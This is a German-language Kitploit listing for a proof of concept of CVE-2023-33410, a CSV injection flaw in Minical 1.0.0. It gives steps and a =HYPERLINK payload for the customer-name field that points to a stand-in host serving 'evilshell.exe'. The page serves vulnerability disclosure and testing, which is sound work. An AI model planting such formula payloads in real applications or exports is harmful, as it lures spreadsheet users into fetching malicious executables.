Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-33410 — Proof-of-Concept, der eine CSV-Injection-Schwachstelle in Minical 1.0.0 über einen bösartigen HYPERLINK-Payload im Feld für den Kundennamen demonstriert, was beim Herunterladen des Berichts zu einer Remote-Code-Ausführung führt. | Kitploit
Tools/GitHubGitHub/thirukrishnan/cve-2023-33410
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubthirukrishnan/cve-2023-33410

CVE-2023-33410

Proof-of-Concept, der eine CSV-Injection-Schwachstelle in Minical 1.0.0 über einen bösartigen HYPERLINK-Payload im Feld für den Kundennamen demonstriert, was beim Herunterladen des Berichts zu einer Remote-Code-Ausführung führt.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
1vor 3 JahrenNoch nicht geprüft

CVE-2023-33410

Minical 1.0.0 ist anfällig für CSV-Injection.

Anbieter: https://github.com/minical/minical

Demo-Anwendung: https://demo.minical.io/


PoC

Schritt 1: Navigieren Sie zum Modul "Buchhaltung" und klicken Sie auf "Neuen Kunden anlegen".

image

Schritt 2: Geben Sie die Payload in das Feld "Name" ein und klicken Sie auf "Erstellen".

Payload: =HYPERLINK("<https://malicious.com/evilshell.exe>","ClickHere")

image

image

Schritt 3: Klicken Sie auf "CSV-Bericht herunterladen" und beobachten Sie, wie die Payload gerendert wird.

image

Tool herunterladen